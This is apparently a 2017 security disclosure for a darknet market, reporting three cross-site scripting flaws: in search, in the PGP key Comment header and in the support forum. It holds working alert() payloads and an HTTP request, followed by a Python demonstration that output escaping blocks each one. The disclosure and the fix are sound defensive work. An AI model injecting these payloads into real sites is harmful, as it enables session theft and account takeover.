Created August 1, 2017 16:26

DHL Market Security Vulnerabilities

Market Name: DHL - Dark Heroes League
Date: 1st August 2017
By: t0mcheck
URL: http://darkheroesq46awl.onion
Test Time: 60 minutes
Access Level: anonymous, regular buyer account
Disclosure: Reported to support - full disclosure

DHL - Darknet Heroes League is a darknet market.

Table of Contents

  1. Vulnerability 1: Reflected XSS in Main Search
  2. Vulnerability 2: Persistent XSS in PGP key upload
  3. Vulnerability 3: Persistent XSS In Support Forum

Vulnerability 1: Reflected XSS in Main Search

Reflected XSS in the main search field: the q parameter is echoed into the page without any characters being filtered or escaped.

Request

GET /search?q=x00%22%3E%3Cimg%20src=/%20onerror%3djavascript%3aalert%28%27XSS%27%29%3E HTTP/1.1
Host: darkheroesq46awl.onion
Cookie: PHPSESSID=xxx; auth_hash=xxx
Connection: close

Response (trimmed)

<main class="main-content" role="main">
<h1>Search Results &mdash; x00'>
    <img src=/ onerror=javascript:alert('XSS')>
</h1>
<form action="search?q=x00">
    <img src=/ onerror=javascript:alert('XSS')>
    " method="GET">
    <input type='hidden' name='q' value='x00"><img src=/ onerror=javascript:alert('XSS')>
    '>
    <table class="product-filter-table">
    <thead>
        <tr>
        <th>Ships from...</th>
        <th>&nbsp;</th>
        </tr>
    </thead>

Screenshot: dhlvuln1

Vulnerability 2: Persistent XSS in PGP key upload

The Comment header of an uploaded PGP key can contain HTML and JavaScript, and it is not escaped when the key is displayed.

Example key

-----BEGIN PGP PUBLIC KEY BLOCK-----
Comment: </textarea><img src=/ onerror=javascript:alert(0)>

-----END PGP PUBLIC KEY BLOCK-----

Screenshot: dhlvuln2

Vulnerability 3: Persistent XSS In Support Forum

While reporting the last two bugs to support I noticed that pasting in the vulnerable code triggered an XSS in the support forum.

To trigger the XSS in the support forum, simply message support with:

</textarea><img src=/ onerror=javascript:alert(1)>

Screenshot: vuln3
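Added example (not from the gist and not the market's own code) covering all three findings: a Python reconstruction of the three places the Vulnerability 1 response echoes q (h1 text, double-quoted action attribute, single-quoted hidden value) and of a textarea-based field like the key upload and support message (Vulnerabilities 2 and 3), fed the gist's own payloads, showing that context-appropriate output encoding stops each one. The templates, field names and the assumption that the key is echoed inside a textarea are mine.

```python
import html
from urllib.parse import quote

# Search payload from the gist's request, URL-decoded (constructed test input).
SEARCH_PAYLOAD = "x00\"><img src=/ onerror=javascript:alert('XSS')>"
# Comment: header from the gist's example key, which breaks out of a textarea.
KEY_COMMENT = "</textarea><img src=/ onerror=javascript:alert(0)>"


def render_search(q: str, escape: bool) -> str:
    """Hypothetical template for the three places the trimmed response echoes q:
    h1 text, a double-quoted action attribute and a single-quoted hidden value."""
    if escape:
        text = html.escape(q, quote=True)          # text and quoted attributes
        in_url = html.escape(quote(q), quote=True)  # URL in attribute: percent-encode, then HTML-escape
    else:
        text = in_url = q                           # what the market does today
    return (
        f"<h1>Search Results &mdash; {text}</h1>\n"
        f'<form action="search?q={in_url}" method="GET">\n'
        f"<input type='hidden' name='q' value='{text}'>\n"
    )


def render_key_field(comment: str, escape: bool) -> str:
    """Hypothetical edit form that echoes the armored key inside a <textarea>;
    the same treatment covers the support-forum message body."""
    armored = "-----BEGIN PGP PUBLIC KEY BLOCK-----\nComment: " + comment + "\n"
    body = html.escape(armored, quote=True) if escape else armored
    return "<textarea name='pgp'>" + body + "</textarea>"


def injected_tag_survives(rendered: str) -> bool:
    """True when an injected element or a second </textarea> reached the markup."""
    return "<img" in rendered or rendered.count("</textarea>") > 1


if __name__ == "__main__":
    for name, render, payload in (("search", render_search, SEARCH_PAYLOAD),
                                  ("pgp key", render_key_field, KEY_COMMENT)):
        print(name, "unescaped:", injected_tag_survives(render(payload, False)),
              "escaped:", injected_tag_survives(render(payload, True)))
```

The server-side fix is the escaped branch: escape at output time for the context the value lands in, rather than filtering characters on input.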
